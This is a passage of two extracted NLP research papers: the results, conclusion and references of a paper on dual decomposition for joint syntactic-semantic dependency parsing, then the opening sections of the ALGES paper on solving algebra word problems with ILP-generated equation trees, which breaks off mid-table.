Forest methods, and find convergence in more than 99.5% of sentences. Compared to the pipeline running assignment, DD improves semantic F1 for first-order inference, but not for higher-order inference, suggesting that 2nd order predictions of paths are quite accurate. We also observe slight benefits in syntactic accuracy. Table 3 presents results of our system on the test sets, where we run Pipeline with Assignment and Dual Decomposition with our best configura- tion (β = 0.8/0.9 for 1st/2nd order syntax). For comparison, the table also reports the results of the best CoNLL–2009 joint system, Merlo09 (Ges- mundo et al., 2009), which proved to be very com- petitive ranking third in the closed challenge. We also include Lluı́s09 (Lluı́s et al., 2009), which is an- other joint syntactic-semantic system from CoNLL– 2009.8 In the WSJ test DD obtains the best syntactic accuracies, while the Pipeline obtains the best se- 8Another system to compare to is the joint system by Jo- hansson (2009). Unfortunately, a direct comparison is not possi- ble because it is evaluated on the CoNLL-2008 datasets, which 227 WSJ LAS UAS semp semr semF1 sempp Lluı́s09 87.48 89.91 73.87 67.40 70.49 39.68 Merlo09 88.79 91.26 81.00 76.45 78.66 54.80 Pipe-Assig 1st 86.85 89.68 85.12 73.78 79.05 54.12 DD 1st 87.04 89.89 85.03 74.56 79.45 54.92 Pipe-Assig 2nd 89.19 91.62 86.11 75.16 80.26 55.96 DD 2nd 89.21 91.64 86.01 74.84 80.04 55.73 Brown LAS UAS semp semr semF1 sempp Lluı́s09 80.92 85.96 62.29 59.22 60.71 29.79 Merlo09 80.84 86.32 68.97 63.06 65.89 38.92 Pipe-Assig 1st 80.96 86.58 72.91 60.16 65.93 38.44 DD 1st 81.18 86.86 72.53 60.76 66.12 38.13 Pipe-Assig 2nd 82.56 87.98 73.94 61.63 67.23 38.99 DD 2nd 82.61 88.04 74.12 61.59 67.28 38.92 Table 3: Comparative results on the CoNLL–2009 En- glish test sets, namely the WSJ test (top table) and the out of domain test from the Brown corpus (bottom table). mantic F1. The bottom part of Table 3 presents re- sults on the out-of-domain Brown test corpus. In this case, DD obtains slightly better results than the rest, both in terms of syntactic accuracy and semantic F1. Table 4 shows statistical significance tests for the syntactic LAS and semantic F1 scores of Table 3. We have applied the sign test (Wackerly et al., 2007) and approximate randomization tests (Yeh, 2000) to all pairs of systems outputs. The differences be- tween systems in the WSJ test can be considered significant in almost all cases with p = 0.05. In the Brown test set, results are more unstable and dif- ferences are not significant in general, probably be- cause of the relatively small size of that test. Regarding running times, our implementation of the baseline pipeline with 2nd order inference parses the development set (1,334 sentences) in less than 7 minutes. Running assignment in the pipeline in- creases parsing time by ∼8% due to the overhead from the assignment algorithm. The Forest method, with an average of 61.3 paths per predicate, is ∼13% slower than the pipeline due to the exploration of the space of precomputed paths. Finally, Dual Decom- position with 2nd order inference converges in 36.6 iterations per sentence on average. The first itera- tion of DD has to perform roughly the same work as Forest, while subsequent iterations only need to re-parse the sentence with respect to the dual up- are slightly different. However, note that Merlo09 is an applica- tion of the system by Titov et al. (2009). In that paper authors report results on the CoNLL-2008 datasets, and they are com- parable to Johansson’s. WSJ Brown ME PA1 DD1 PA2 DD2 ME PA1 DD1 PA2 DD2 LL ◦•�� ◦•�� •�� ◦•�� ◦•�� ◦•�� ◦•�� ME ◦• ◦•�� ◦•�� ◦•�� • • PA1 ◦•�� ◦•�� ◦•�� • ◦•� ◦•�� DD1 ◦•�� ◦•�� ◦•� ◦•�� PA2 •�� Table 4: Statistical tests of significance for LAS and semF1 differences between pairs of systems from Table 3. ◦/• = LAS difference is significant by the sign/ approxi- mate randomization tests at 0.05 level. �/� = same mean- ing for semF1 . The legend for systems is: LL: Lluı́s09, ME: Merlo09, PA1/2: Pipeline with Assignment, 1st/2nd order, DD1/2: Dual Decomposition, 1st/2nd order. dates, which are extremely sparse. Our current im- plementation did not take advantage of the sparsity of updates, and overall, DD was on average 13 times slower than the pipeline running assignment and 15 times slower than the baseline pipeline. 7 Conclusion We have introduced efficient methods to parse syntactic dependency structures augmented with predicate-argument relations, with two key ideas. One is to predict the local syntactic structure that links a predicate with its arguments, and seek agree- ment with the full syntactic structure using dual decomposition techniques. The second is to con- trol linear assignment constraints in the predicate- argument structure. In experiments we observe large improvements resulting from the assignment constraints. As for the dual decomposition technique for joint parsing, it does improve over the pipelines when we use a first order parser. This means that in this configu- ration the explicit semantic features help to find a solution that is better in both layers. To some ex- tent, this empirically validates the research objec- tive of joint models. However, when we move to second-order parsers the differences with respect to the pipeline are insignificant. It is to be expected that as syntactic parsers improve, the need of joint methods is less critical. It remains an open question to validate if large improvements can be achieved by integrating syntactic-semantic features. To study this question, it is necessary to have efficient pars- ing algorithms for joint dependency structures. This paper contributes with a method that has optimality 228 guarantees whenever it converges. Our method can incorporate richer families of fea- tures. It is straightforward to incorporate better se- mantic representations of predicates and arguments than just plain words, e.g. by exploiting WordNet or distributional representations as in (Zapirain et al., 2013). Potentially, this could result in larger im- provements in the performance of syntactic and se- mantic parsing. It is also necessary to experiment with differ- ent languages, where the performance of syntactic parsers is lower than in English, and hence there is potential for improvement. Our treatment of local syntactic structure that links predicates with argu- ments, based on explicit enumeration of likely paths, was simplistic. Future work should explore meth- ods that model the syntactic structure linking predi- cates with arguments: whenever this structure can be parsed efficiently, our dual decomposition algorithm can be employed to define an efficient joint system. Acknowledgments We thank the editor and the anonymous reviewers for their valuable feedback. This work was financed by the European Commission for the XLike project (FP7- 288342); and by the Spanish Government for project OpenMT-2 (TIN2009-14675-C03-01), project Skater (TIN2012-38584-C06-01), and a Ramón y Cajal contract for Xavier Carreras (RYC-2008-02223). References Rainer Burkard, Mario Dell’Amico, and Silvano Martello. 2009. Assignment Problems. Society for Industrial and Applied Mathematics. Xavier Carreras and Lluı́s Màrquez. 2005. Introduc- tion to the CoNLL-2005 shared task: Semantic role labeling. In Proceedings of the Ninth Conference on Computational Natural Language Learning (CoNLL- 2005), pages 152–164, Ann Arbor, Michigan, June. Xavier Carreras. 2007. Experiments with a higher-order projective dependency parser. In Proceedings of the CoNLL Shared Task Session of EMNLP-CoNLL 2007, pages 957–961, Prague, Czech Republic, June. Michael Collins. 2002. Discriminative training meth- ods for Hidden Markov Models: Theory and experi- ments with Perceptron algorithms. In Proceedings of the 2002 Conference on Empirical Methods in Natural Language Processing, pages 1–8, July. Dipanjan Das, André F. T. Martins, and Noah A. Smith. 2012. An exact dual decomposition algorithm for shallow semantic parsing with constraints. In Pro- ceedings of the First Joint Conference on Lexical and Computational Semantics - Volume 1: Proceedings of the main conference and the shared task, and Volume 2: Proceedings of the Sixth International Workshop on Semantic Evaluation, SemEval ’12, pages 209–217, Stroudsburg, PA, USA. Jason Eisner. 2000. Bilexical grammars and their cubic- time parsing algorithms. In Harry Bunt and Anton Nijholt, editors, Advances in Probabilistic and Other Parsing Technologies, pages 29–62. Kluwer Academic Publishers, October. Andrea Gesmundo, James Henderson, Paola Merlo, and Ivan Titov. 2009. A latent variable model of syn- chronous syntactic-semantic parsing for multiple lan- guages. In Proceedings of the Thirteenth Confer- ence on Computational Natural Language Learning (CoNLL 2009): Shared Task, pages 37–42, Boulder, Colorado, June. Daniel Gildea and Daniel Jurafsky. 2002. Automatic la- beling of semantic roles. Computational Linguistics, 28(3):245–288, September. Daniel Gildea and Martha Palmer. 2002. The necessity of parsing for predicate argument recognition. In Pro- ceedings of 40th Annual Meeting of the Association for Computational Linguistics, pages 239–246, Philadel- phia, Pennsylvania, USA, July. Jan Hajič, Massimiliano Ciaramita, Richard Johans- son, Daisuke Kawahara, Maria Antònia Martı́, Lluı́s Màrquez, Adam Meyers, Joakim Nivre, Sebastian Padó, Jan Štěpánek, Pavel Straňák, Mihai Surdeanu, Nianwen Xue, and Yi Zhang. 2009. The CoNLL- 2009 shared task: Syntactic and semantic dependen- cies in multiple languages. In Proceedings of the 13th Conference on Computational Natural Language Learning (CoNLL-2009): Shared Task, pages 1–18, Boulder, Colorado, USA, June. Richard Johansson. 2009. Statistical bistratal depen- dency parsing. In Proceedings of the 2009 Conference on Empirical Methods in Natural Language Process- ing, pages 561–569, Singapore, August. Terry Koo, Amir Globerson, Xavier Carreras, and Michael Collins. 2007. Structured prediction mod- els via the matrix-tree theorem. In Proceedings of the 2007 Joint Conference on Empirical Methods in Nat- ural Language Processing and Computational Natu- ral Language Learning (EMNLP-CoNLL), pages 141– 150, Prague, Czech Republic, June. Terry Koo, Alexander M. Rush, Michael Collins, Tommi Jaakkola, and David Sontag. 2010. Dual decompo- sition for parsing with non-projective head automata. In Proceedings of the 2010 Conference on Empiri- cal Methods in Natural Language Processing, pages 1288–1298, Cambridge, MA, October. 229 Harold W. Kuhn. 1955. The Hungarian method for the assignment problem. Naval Research Logistics Quar- terly, 2(1-2):83–97. Xavier Lluı́s, Stefan Bott, and Lluı́s Màrquez. 2009. A second-order joint eisner model for syntactic and semantic dependency parsing. In Proceedings of the Thirteenth Conference on Computational Natu- ral Language Learning (CoNLL 2009): Shared Task, pages 79–84, Boulder, Colorado, June. Lluı́s Màrquez, Xavier Carreras, Kenneth C. Litkowski, and Suzanne Stevenson. 2008. Semantic Role Label- ing: An Introduction to the Special Issue. Computa- tional Linguistics, 34(2):145–159, June. André Martins, Noah Smith, and Eric Xing. 2009. Con- cise integer linear programming formulations for de- pendency parsing. In Proceedings of the Joint Con- ference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Lan- guage Processing of the AFNLP, pages 342–350, Sun- tec, Singapore, August. Ryan McDonald, Koby Crammer, and Fernando Pereira. 2005. Online large-margin training of dependency parsers. In Proceedings of the 43rd Annual Meet- ing of the Association for Computational Linguistics (ACL’05), pages 91–98, Ann Arbor, Michigan, June. Adam Meyers, Ruth Reeves, Catherine Macleod, Rachel Szekely, Veronika Zielinska, Brian Young, and Ralph Grishman. 2004. The NomBank Project: An interim report. In A. Meyers, editor, HLT-NAACL 2004 Work- shop: Frontiers in Corpus Annotation, pages 24–31, Boston, Massachusetts, USA, May. Alessandro Moschitti. 2004. A study on convolution kernels for shallow statistic parsing. In Proceedings of the 42nd Meeting of the Association for Computa- tional Linguistics (ACL’04), Main Volume, pages 335– 342, Barcelona, Spain, July. Joakim Nivre and Jens Nilsson. 2005. Pseudo-projective dependency parsing. In Proceedings of the 43rd Annual Meeting of the Association for Computa- tional Linguistics (ACL’05), pages 99–106, Ann Ar- bor, Michigan, June. Martha Palmer, Daniel Gildea, and Paul Kingsbury. 2005. The Proposition Bank: An annotated corpus of semantic roles. Computational Linguistics, 31(1):71– 106, March. Vasin Punyakanok, Dan Roth, and Wen tau Yih. 2008. The importance of syntactic parsing and inference in semantic role labeling. Computational Linguistics, 34(3):257–287, June. Sebastian Riedel and Andrew McCallum. 2011. Fast and robust joint models for biomedical event extraction. In Proceedings of the 2011 Conference on Empirical Methods in Natural Language Processing, pages 1–12, Edinburgh, Scotland, UK., July. Alexander M Rush, David Sontag, Michael Collins, and Tommi Jaakkola. 2010. On dual decomposition and linear programming relaxations for natural language processing. In Proceedings of the 2010 Conference on Empirical Methods in Natural Language Processing, pages 1–11, Cambridge, MA, October. David Sontag, Amir Globerson, and Tommi Jaakkola. 2010. Introduction to dual decomposition for infer- ence. In S. Sra, S. Nowozin, and S. J. Wright, editors, Optimization for Machine Learning. MIT Press. Mihai Surdeanu, Richard Johansson, Adam Meyers, Lluı́s Màrquez, and Joakim Nivre. 2008. The conll 2008 shared task on joint parsing of syntactic and se- mantic dependencies. In CoNLL 2008: Proceedings of the Twelfth Conference on Computational Natu- ral Language Learning, pages 159–177, Manchester, England, August. Ivan Titov, James Henderson, Paola Merlo, and Gabriele Musillo. 2009. Online graph planarisation for syn- chronous parsing of semantic and syntactic dependen- cies. In Proceedings of the 21st international jont conference on Artifical intelligence, IJCAI’09, pages 1562–1567. Kristina Toutanova, Aria Haghighi, and Christopher D. Manning. 2008. A global joint model for semantic role labeling. Computational Linguistics, 34(2):161– 191, June. Dennis D. Wackerly, William Mendenhall, and Richard L. Scheaffer, 2007. Mathematical Statis- tics with Applications, chapter 15: Nonparametric statistics. Duxbury Press. Nianwen Xue and Martha Palmer. 2004. Calibrating features for semantic role labeling. In Dekang Lin and Dekai Wu, editors, Proceedings of EMNLP 2004, pages 88–94, Barcelona, Spain, July. Alexander S. Yeh. 2000. More accurate tests for the sta- tistical significance of result differences. In Proceed- ings of the 18th conference on Computational linguis- tics, pages 947–953. Beñat Zapirain, Eneko Agirre, Lluı́s Màrquez, and Mihai Surdeanu. 2013. Selectional preferences for semantic role classification. Computational Linguistics, 39(3). 230 work_7kttx52hpfgffkvvc235rluscq ---- Parsing Algebraic Word Problems into Equations Rik Koncel-Kedziorski, Hannaneh Hajishirzi, Ashish Sabharwal†, Oren Etzioni†, and Siena Dumas Ang University of Washington, †Allen Institute for AI {kedzior,hannaneh,sienaang}@uw.edu, {ashishs,orene}@allenai.org Abstract This paper formalizes the problem of solv- ing multi-sentence algebraic word problems as that of generating and scoring equation trees. We use integer linear programming to gener- ate equation trees and score their likelihood by learning local and global discriminative mod- els. These models are trained on a small set of word problems and their answers, without any manual annotation, in order to choose the equation that best matches the problem text. We refer to the overall system as ALGES. We compare ALGES with previous work and show that it covers the full gamut of arithmetic operations whereas Hosseini et al. (2014) only handle addition and subtraction. In addition, ALGES overcomes the brittleness of the Kush- man et al. (2014) approach on single-equation problems, yielding a 15% to 50% reduction in error. 1 Introduction Grade-school algebra word problems are brief nar- ratives (see Figure 1). A typical problem first de- scribes a partial world state consisting of characters, entities, and quantities. Next it updates the condition of an entity or explicates the relationship between entities. Finally, it poses a question about a quantity in the narrative. An ordinary child has to learn the required alge- bra, but will easily grasp the narrative utilizing ex- tensive world knowledge, large vocabulary, word- sense disambiguation, coreference resolution, mas- tery of syntax, and the ability to combine individual Oceanside Bike Rental Shop charges 17 dollars plus 7 dollars an hour for renting a bike. Tom paid 80 dollars to rent a bike. How many hours did he pay to have the bike checked out? = +$ 17$ ∗$ 7$ xh 80$ solution : 9 17 + (7∗x) = 80 Figure 1: Example problem and solution sentences into a coherent mental model. In contrast, the challenge for an NLP system is to “make sense” of the narrative, which may refer to arbitrary activ- ities like renting bikes, collecting coins, or eating cookies. Previous work coped with the open-domain as- pect of algebraic word problems by relying on deter- ministic state transitions based on verb categoriza- tion (Hosseini et al., 2014) or by learning templates that cover equations of particular forms (Kushman et al., 2014). We have discovered, however, that both approaches are brittle, particularly as training data is scarce in this domain, and the space of equations grows exponentially with the number of quantities mentioned in the math problem. We introduce ALGES,1 which maps an unseen multi-sentence algebraic word problem into a set of possible equation trees. Figure 1 shows an equation tree alongside the word problem it represents. ALGES generates the space of trees via Integer Linear Programming (ILP), which allows it to con- 1The code and data is publicly available at https://gitlab.cs.washington.edu/ALGES/TACL2015 . strain the space of trees to represent type-consistent algebraic equations satisfying as many desirable properties as possible. ALGES learns to map spans of text to arithmetic operators, to combine them given the global context of the problem, and to choose the “best” tree corresponding to the problem. The training set for ALGES consists of unannotated algebraic word problems and their solution. Solv- ing the equation represented by such a tree is trivial. ALGES is described in detail in Section 4. ALGES is able to solve word problems with single-variable equations like the ones in Figure 1. In contrast to Hosseini et al. (2014), ALGES covers +,−,∗, and /. The work of Kushman et al. (2014) has broader scope but we show that it relies heav- ily on overlap between training and test data. When that overlap is reduced, ALGES is 15% to 50% more accurate than this system. Our contributions are as follows: (1) We formal- ize the problem of solving multi-sentence algebraic word problems as that of generating and ranking equation trees; (2) We show how to score the like- lihood of equation trees by learning discriminative models trained from a small number of word prob- lems and their solutions – without any manual an- notation; and (3) We demonstrate empirically that ALGES has broader scope than the system of Hos- seini et al. (2014), and overcomes the brittleness of the method of Kushman et al. (2014). 2 Previous Work Our work is related to situated semantic interpre- tation, which aims to map natural language sen- tences to formal meaning representations (Zelle and Mooney, 1996; Zettlemoyer and Collins, 2005; Ge and Mooney, 2006; Kwiatkowski et al., 2010). More closely related is work on language grounding, whose goal is the interpretation of a sentence in the context of a world representation (Branavan et al., 2009; Liang et al., 2009; Chen et al., 2010; Bordes et al., 2010; Feng and Lapata, 2010; Hajishirzi et al., 2011; Matuszek et al., 2012; Hajishirzi et al., 2012; Artzi and Zettlemoyer, 2013; Koncel-Kedziorski et al., 2014; Yatskar et al., 2014; Seo et al., 2014; Hixon et al., 2015). However, while most previ- ous work considered individual sentences in isola- tion, solving word problems often requires reason- ing across the multi-sentence discourse of the prob- lem text. Recent efforts in the math domain have studied number word problems (Shi et al., 2015), logic puzzle problems (Mitra and Baral, 2015), arithmetic word problems (Hosseini et al., 2014; Roy et al., 2015a), algebra word problems (Kush- man et al., 2014; Zhou et al., 2015), and geometry word problems (Seo et al., 2015). Roy et al. (2015b) introduce a system for reason- ing about quantities, which they extend to arithmetic word problems that can be solved by choosing only two values from the text and applying an arithmetic operator. By comparison, our method learns to solve complex problems with many operands where the space of possible solutions is larger. Hosseini et al. (2014) solve elementary addition and subtraction problems by learning verb cate- gories. They ground the problem text to a seman- tics of entities and containers, and decide if quanti- ties are increasing or decreasing in a container based upon the learned verb categories. While relying only on verb categories works well for +,−, model- ing ∗,/ requires going beyond verbs. For instance, “Tina has 2 cats. John has 3 more cats than Tina. How many cats do they have together?” and “Tina has 2 cats. John has 3 times as many cats as Tina. How many cats do they have together?” have identi- cal verbs, but the indicated operation (+ and * resp.) is different. ALGES makes use of a richer seman- tic representation which facilitates deeper learning and a wider scope of application, solving problems involving the +,−,/, and ∗ operators (see Table 6). Kushman et al. (2014) introduce a general method for solving algebra problems. This work can align a word problem to a system of equations with one or two unknowns. They learn a mapping from word problems to equation templates using global and lo- cal features from the problem text. However, the large space of equation templates makes it challeng- ing for this model to learn to find the best equation directly, as a sufficiently similar template may not have been observed during training. Instead, our method maps word problems to equation trees, tak- ing advantage of a richer representation of quanti- fied nouns and their properties, as well as the recur- sive nature of equation trees. These allow ALGES to use a bottom-up approach to learn the correspon- dence between spans of texts and arithmetic oper- ators (corresponding to intermediate nodes in the tree). ALGES then scores equations using global structure of the problem to produce the final result. Our work is also related to research in using ILP to enforce global constraints in NLP appli- cations (Roth and Yih, 2004). Most previous work (Srikumar and Roth, 2011; Goldwasser and Roth, 2011; Berant et al., 2014; Liu et al., 2015) uti- lizes ILP as an inference procedure to find the best global prediction over initially trained local classi- fiers. Similarly, we use ILP to enforce global and domain specific constraints. We, however, use ILP to form candidate equations which are then used to generate training data for our classifiers. Our work is also related to parser re-ranking (Collins, 2005; Ge and Mooney, 2005), where a re-ranker model at- tempts to improve the output of an existing proba- bilistic parser. Similarly, the global equation model designed in ALGES attempts to re-rank equations based on global problem structure. 3 Setup and Problem Definition Given numeric quantities V and an unknown x whose value is the answer we seek, an equation over V and x is any valid mathematical expression formed by combining elements of V ∪{x} using bi- nary operators from O = {+,−,∗,/,=} such that x appears exactly once. When each element of V appears at most once in the equation, it may natu- rally be represented as an equation tree where each operator is a node with edges to its two operands.2 T denotes the set of all equation trees over V and x. Problem Formulation. We address the problem of solving grade-school algebra word problems that map to single equations. Solving such a word prob- lem w amounts to selecting an equation tree t repre- senting the mathematical computation implicit in w. Figure 1 shows an example of w with quantities un- derlined, and the corresponding tree t. Formally, we use a joint probability distribution p(t,w) that de- fines how “well” an equation tree t ∈ T captures the mathematical computation expressed in w. Given a word problem w as input, our goal is to compute t̃ = arg maxt∈T p(t|w). 2Problems involving simultaneous equations require com- bining multiple equation trees, one per equation. 375−(7*x)= 4 375= (7*x)+4 375= (x*7)+4 3. Train local model (sec(on 7.1) On Monday, 375 students went on a trip to the zoo. All 7 buses were filled and 4 students had to travel in cars. How many students were in each bus ? Qnt: 375 Ent: Student Qnt: 7 Ent: Bus Qnt: 4 Ent: Student Qnt: x Ent: Student Ctr: Bus 1. Ground text w into base Qsets (sec(on 5) : subset of T(w) yielding correct solu(on 375s *s -s 4s 7b xs = 375s = +s *s 4s 7b xs 375s +s -s 4s = 7b xs (7b,xs) (375s,combine(7b,xs)) (7b,xs) (combine(7b,xs),4s) 2. Use ILP to generate M equa(on trees T(w) (Sec(on 6) 4. Train global model (sec(on 7.2) : problem-‐tree pairs 375+(7*x)= 4 375= (7/ x)+4 375−(x+7)= 4 Trlocal Trglobal Tl(w) : operator nodes in Tl(w) T(w) \Tl(w) Training example Label * − * + Posi>ve examples (from ) Nega>ve examples (from ) Tl(w) T(w) \Tl(w) Figure 2: An overview of the process of learning for a word problem and its Qsets. An exhaustive enumeration over T quickly be- comes impractical as problem complexity increases and n = |V ∪ {x}| grows. Specifically, |T| > h(n) = n! (n−1)! (n−1) 2n−4, h(4) = 432,h(6) > 1.7M,h(8) > 22B, etc. This vast search space makes it challenging for a discriminative model to learn to find t̃ directly, as a sufficiently similar tree may not have been observed during training. In- stead, our method first generates syntactically valid equation trees, and then uses a bottom-up approach to score equations with a local model trained to map spans of text to math operators, and a global model trained for coherence of the entire equation w.r.t. global problem text structure. 4 Overview of the Approach Figure 2 gives an overview of our method, also detailed in Figure 3. In order to build equation trees, we use a compact representation for each node called a Quantified Set or Qset to model natural lan- guage text quantities and their properties (e.g., ‘375 students’ in ‘7 buses’). Qsets are used for tracking and combining quantities when learning the corre- spondence between equation trees and text. Definition 1. Given a math word problem w, let S Learning (word problems W , corresponding solutions L): 1. For every problem-solution pair (wi,`i) with wi ∈ W,`i ∈ L (a) S ← Base Qsets obtained by Grounding text wi and Reordering the resulting Qsets (Section 5) (b) Ti ← Top M type-consistent equation tree candidates generated by ILP(wi) (Section 6) (c) T`i ← Subset of Ti that yields the correct numerical solution `i (d) Add to Trlocal features 〈s1,s2〉 with label op for each operator op combining Qsets s1,s2 in trees in T`i (e) Add to Trglobal features 〈w,t〉 labeled positive for each t ∈ T`i and labeled negative for each t ∈ T \T`i 2. Llocal ← Train a local Qset relationship model on Trlocal (Section 7.1) 3. Gglobal ← Train a global equation model on Trglobal (Section 7.2) 4. Output local and global models (Llocal,Gglobal) Inference (word problem w, local set relation model Llocal , global equation model Gglobal ): 1. S ← Base Qsets obtained by Grounding text wi and Reordering the resulting Qsets (Section 5) 2. T ← Top M type-consistent equation tree candidates generated by ILP(w) (Section 6) 3. t∗ ← arg maxti∈T (∏ tj∈t Llocal(tj|w) ) ×Gglobal(t|w), scoring each tree ti ∈ T based on Equation 1 4. ` ← Numeric solution to w obtained by solving equation tree t∗ for the unknown 5. Output (t∗,`) Figure 3: Overview of our method for solving algebraic word problems. be the set of all possible spans of text in w, φ denote the empty span, and Sφ = S∪{φ}. A Qset for w is either a base Qset or a compound Qset. A base Qset is a tuple (ent,qnt,adj, loc,vrb,syn,ctr) with: • ent ∈ S: entity or quantity noun (e.g., ‘student’); • qnt ∈ R∪{x}: number or quantity (e.g., 4 or x); • adj ⊆ Sφ: adjectives for ent in w; • loc ∈ Sφ: location of ent (e.g., ‘in the drawer’); • vrb ∈ Sφ: governing verb for ent (e.g., ‘fill’); • syn: syntactic and positional information for ent (e.g., ‘buses’ is in subject position) ; • ctr ⊆ Sφ: containers of ent (e.g., ‘Bus’ is a con- tainer for the ‘students’ Qset). Properties being φ indicates these optional proper- ties are unspecified. A compound Qset is formed by combining two Qsets with a non-equality binary op- erator as discussed in section 5. Qsets can be further combined with the equality operator to yield a semantically augmented equation tree.3 The example in Figure 2 has four base Qsets extracted from problem text. Each possible equation tree corresponds to a different recursive combination of these four Qsets. Given w, ALGES first extracts a list of n base Qsets S = {s1, . . . ,sn} (Section 5). It then uses an ILP-based optimization method to combine ex- tracted Qsets into a list of type-consistent candidate 3Inspired by Semantically Augmented Parse Trees (Ge and Mooney, 2005) adapted to equational logic. equation trees (Section 6). Finally, ALGES uses dis- criminative models to score each candidate equation, using both local and global features (Section 7). Specifically, the recursive nature of our represen- tation allows us to decompose the likelihood func- tion p(t,w) into local scoring functions for each in- ternal node of t followed by scoring the root node: p(t|w) ∝  ∏ tj∈t Llocal(tj|w)  ×Gglobal(t|w) (1) where the local function Llocal(tj|w) scores the like- lihood of the subtree tj, modeling pairwise Qset re- lationships, while the global function Gglobal(t|w) scores the likelihood of the root of t, modeling the equation in its entirety. Learning. ALGES learns in a weakly supervised fashion, using word problems wi and only their cor- rect answer `i (not the corresponding equation tree) as training data {(wi,`i)}i∈{1,...,N}. We ground each wi into ordered Qsets and generate a list of type-consistent candidate training equations T`i that yield the correct answer `i. We build a local discriminative model Llocal to score the likelihood that a math operator op ∈ O can correctly combine two Qsets s1 and s2 based on their semantics and intertextual relationships. For example, in Figure 2 this model learns that ∗ has a high likelihood score for ‘7 buses’ and ‘x students’. The training data consists of feature vectors 〈s1,s2〉 labeled with op, derived from the equation trees that yield the correct solution. We also build a global discriminative model that scores equation trees based on the global problem structure: Gglobal = ψᵀfglobal(w,t) where fglobal represents global features of w and t, and φ are pa- rameters to be learned. The training data consists of feature vectors 〈w,t〉 for equation trees that yield the correct solution as positive examples, and the rest as negatives (Figure 2). The details of learning and in- ference steps are described in Section 7. 5 Grounding and Combining Qsets We discuss how word problem text is grounded into an ordered list of Qsets. A Qset is a compact rep- resentation of the properties of a quantity as de- scribed in a single sentence. The use of Qsets facil- itates the building of semantically augmented equa- tion trees. Additionally, by tracking certain proper- ties of text quantities, ALGES can resolve pronomi- nal references or elided nouns to properties of previ- ous Qsets. It can also combine information about quantities referenced in different sentences into a single semantic structure for further use. Grounding. ALGES translates the text of the prob- lem w into interrelated base Qsets {s1, . . . ,sn}, each associated with a quantity in the problem text w. The properties of each Qset (Definition 1) are ex- tracted from the dependency parse relations present in the sentence where the quantity is referred to ac- cording to the rules described in Table 1. Additionally, ALGES assigns a single target Qset sx corresponding to the question sentence. The properties of the target Qset are also extracted ac- cording to the rules of the Table 1. In particular, the qnt property is set to unknown, the ent is set to the noun appearing after the words what, many or much in the target sentence, and the other properties are extracted as listed in Table 1. Reordering. In order to reduce the space of possible equation trees, ALGES reorders Qsets {s1, . . . ,sn} according to semantic and textual information and enforces a constraint that Qsets can only combine with adjacent Qsets in the equation tree. In Fig- ure 2, the target Qset corresponding to the unknown (x ‘students’) is moved from its textual location at For each quantity mentioned in the text, properties (qnt,ent,ctr,adj,vrb, loc) of the corresponding Qset are extracted as follows: 1. qnt (quantity) is a numerical value or determiner found in the problem text, or a variable. 2. ent (entity) is a noun related to the qnt in the depen- dency parse tree. If qnt is a numerical value, ent is the noun related by the num, number, or prep of rela- tions. If qnt is a determiner, ent is the noun related via the det relation. When such a noun does not exist due to parse failure or pragmatic recoverability, ent is the noun that is closest to qnt in the same sentence or the ent associated with the most recent Qset. 3. ctr (container) is the subject of the verb govern- ing ent, except in two cases: when this subject is a pronominal reference, the ctr is set to the ctr of the closest previous Qset; if ent is related to another Qset whose qnt is one of each, every, a, an, per, or one, ctr is set to the ent of that Qset. 4. adj (adjectives) is a list of adjectives related to ent by the amod relation. 5. vrb (verb) is a governing verb, either related to ent by nsubj or dobj 6. loc (location) is a noun related to ent by prep on, prep in, or prep at relations. Table 1: The process of forming a single Qset. the end of the problem and placed adjacent to the Qset with entity ‘buses’. This move is triggered by the relationship between the target entity ‘student’ and its container ‘bus’ that is quantified by each in the last sentence. In addition to the container match rule, we employ three other rules to move the target Qset as described in Table 2.4 Combining. Two Qsets and an arithmetic operator can be combined via the combine function to form a third Qset, alternately referred to as a compound. Because of this, we can represent intermediate nodes in the equation tree as Qsets themselves. The recur- sive combination of Qsets allows us to effectively decompose equation trees into a collection of local operations over identical abstractions. This enables learning features of Qsets and text that indicate par- ticular operations from both leaf and intermediate nodes. The mechanics of c ← combine(a,b,op) are detailed below. 4These reordering rules are intentionally minimal, but do provide some gain over both preserving the text ordering of quantities or setting ordering as a soft constraint. See Table 7. 1. Move Qset si to immediately after Qset sj if the con- tainer of si is the entity of sj and is quantified by each. 2. Move target Qset to the front of the list if the ques- tion statement includes keywords start or begin. 3. Move target Qset to the end of the list if the question statement includes keywords left, remain, and finish. 4. Move target Qset to the textual location of an inter- mediate reference with the same ent if its num prop- erty is the determiner some. Table 2: Rules for reordering Qsets. For op = +, the properties of either Qset a or b suffice to define c. ALGES always forms c using the properties of b in these situations. For op = −, the properties of the left operand a define the resul- tant set, as evidenced by the subtraction operations present in the first problem in Table 9. To determine the stickers in Luke’s possession, we need to track stickers related to the left Qset with the verb ‘got’. For op = ∗, the Qset relationship is captured by the container and entity properties: the one whose properties preserve after multiplication has the other’s entity as its container. In Figure 2, the ‘bus’ Qset is the container of ‘students’. When these are combined with the ∗ operator, the result is of en- tity type ‘student’. For op = /, we use the prop- erties of the left operand to encourage a distinction between division and multiplication. 6 Generating Equation Trees with ILP We use an ILP optimization model to generate equa- tion trees involving n base Qsets. These equation trees are used for both learning and inference steps. ALGES generates an ordered list of M of the most desirable candidate equations for a given word prob- lem w using an ILP, which models global consider- ations such as type consistency and appropriate low expression complexity. To facilitate generation of equation trees, we represent them in parenthesis-free postfix or reverse Polish notation, where a binary op- erator immediately follows the two operands it op- erates on (e.g., abc+∗x=). Given a word problem w with n base Qsets (cf. Table 3 for notation), we build an optimization model ILP(w) over the space of postfix equations E = e1e2 . . .eL of length L involving k numeric constants, k′ = n − k unknowns, r possible binary operators, and q “types” of Qsets, where type cor- responds to the entity property of Qsets and deter- mines which binary relationships are permitted be- tween two given Qsets. For single variable equations over binary operators O, k′ = 1,r = |O| = 5, and L = 2n− 1. For brevity, define m = n + r and let [j] denote {1, . . . ,j}. Expression E can be evalu- ated by considering e1,e2, . . . ,eL in order, pushing non-operator symbols on to a stack σ, and, for op- erator symbols, popping the top two elements of σ, applying the operator to them, and pushing the result back on to σ. The stack depth of the ei is the stack size after ei has been processed this way. INPUT w input math word problem n number of base Qsets k number of numeric constants k′ number of unknowns (1 for single-var. eqns.) r number of binary operators (r = |O| = 5) m number of possible symbols (n + r) typej type of j-th base Qset M desired number of candidate equation trees L desired length of postfix equations (2n−1) OUTPUT E postfix equation to be generated ei i-th element of E; i ∈ [L] VARIABLES for i ∈ [L] xi main ILP variable for i-th symbol of E ci indicator variable: ei is a numeric constant ui indicator variable: ei is an unknown oi indicator variable: ei is 